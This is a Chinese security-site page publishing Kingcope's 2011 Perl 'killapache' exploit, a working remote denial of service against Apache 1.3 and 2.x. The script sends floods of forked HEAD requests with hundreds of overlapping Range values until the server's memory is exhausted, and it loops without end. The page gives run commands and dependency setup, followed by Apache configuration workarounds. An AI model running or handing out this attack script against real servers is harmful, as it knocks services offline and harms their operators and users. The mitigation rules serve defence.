Apache 2.x 
Apache 1.3



测试方法:

[sebug.net]

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负



#! /usr/bin/perl

!#Apache httpd Remote Denial of Service (memory exhaustion)

#By Kingcope

#Year 2011

#

# Will result in swapping memory to filesystem on the remote side

# plus killing of processes when running out of swap space.

# Remote System becomes unstable.

#

 

use IO::Socket;

use Parallel::ForkManager;

 

sub usage {

    print "Apache Remote Denial of Service (memory exhaustion)\n";

    print "by Kingcope\n";

    print "usage: perl killapache.pl <host> [numforks]\n";

    print "example: perl killapache.pl www.example.com 50\n";

}

 

sub killapache {

print "ATTACKING $ARGV[0] [using $numforks forks]\n";

     

$pm = new Parallel::ForkManager($numforks);

 

$|=1;

srand(time());

$p = "";

for ($k=0;$k<1300;$k++) {

    $p .= ",5-$k";

}

 

for ($k=0;$k<$numforks;$k++) {

my $pid = $pm->start and next;  

     

$x = "";

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

                                 PeerPort => "80",

                                 Proto    => 'tcp');

 

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;

 

while(<$sock>) {

}

 $pm->finish;

}

$pm->wait_all_children;

print ":pPpPpppPpPPppPpppPp\n";

}

 

sub testapache {

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

                                 PeerPort => "80",

                                 Proto    => 'tcp');

 

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;

 

$x = <$sock>;

if ($x =~ /Partial/) {

    print "host seems vuln\n";

    return 1;  

} else {

    return 0;  

}

}

 

if ($#ARGV < 0) {

    usage;

    exit;  

}

 

if ($#ARGV > 1) {

    $numforks = $ARGV[1];

} else {$numforks = 50;}

 

$v = testapache();

if ($v == 0) {

    print "Host does not seem vulnerable\n";

    exit;  

}

while(1) {

killapache();

}



运行方法(假如保存文件名为name.pl)：#perl name.pl 127.0.0.1 50



临时解决方法：



在厂商提供官方补丁或新版本软件之前，建议用户采用如下的配置方案之一以尽可能免受漏洞的影响：



* 使用SetEnvIf配置命令来忽略畸形的Ranger选项，适用于Apache 2.0和2.2 。



    修改Apache的配置文件httpd.conf。

  

    去掉如下行的注释：

  

    LoadModule headers_module modules/mod_headers.so

  

    增加如下行的配置命令：



    SetEnvIf Range (,.*?){5,} bad-range=1

    RequestHeader unset Range env=bad-range



    重启Apache服务器。

  

* 安装启用mod_rewrite，设置规则过滤规则禁止带有畸形的Ranger选项的请求，适用于所有版本的

  Apache 。



    修改Apache的配置文件httpd.conf。

  

    去掉如下行的注释：

  

    LoadModule rewrite_module modules/mod_rewrite.so



    加入如下的mod_rewrite的规则配置行：

  

    RewriteEngine on

    RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)

    RewriteRule .* - [F]

    

    重启Apache服务器。





上述两种配置会禁止Range选项包含超过5个范围指定命令的请求，在通常应用场景中对Web应用应该不会有什么影响，如果Web应用提供PDF数据或流媒体信息，可能需要调整阈值到更大的数值。



注：上面脚本需要 Parallel-ForkManager 支持，下载地址http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz

[root@localhost ~]# tar -xzvf Parallel-ForkManager-0.7.9.tar.gz

[root@localhost ~]# cd Parallel-ForkManager-0.7.9

[root@localhost Parallel-ForkManager-0.7.9]# perl Makefile.PL  && make &&  make install 



若出现下面警告的解决方法：

perl: warning: Setting locale 
failed.

perl: warning: Please check that 
your locale settings:

        LANGUAGE = 
"zh_CN:zh",

        LC_ALL = (unset),

        LANG = 
"en_US:zh_CN.UTF-8"

    are supported and installed on 
your system.

perl: warning: Falling back to the 
standard locale ("C").



[root@localhost ~]#vi .bashrc

export LANG=en_US:zh_CN.UTF-8

export LC_ALL=C

[root@localhost ~]# source .bashrc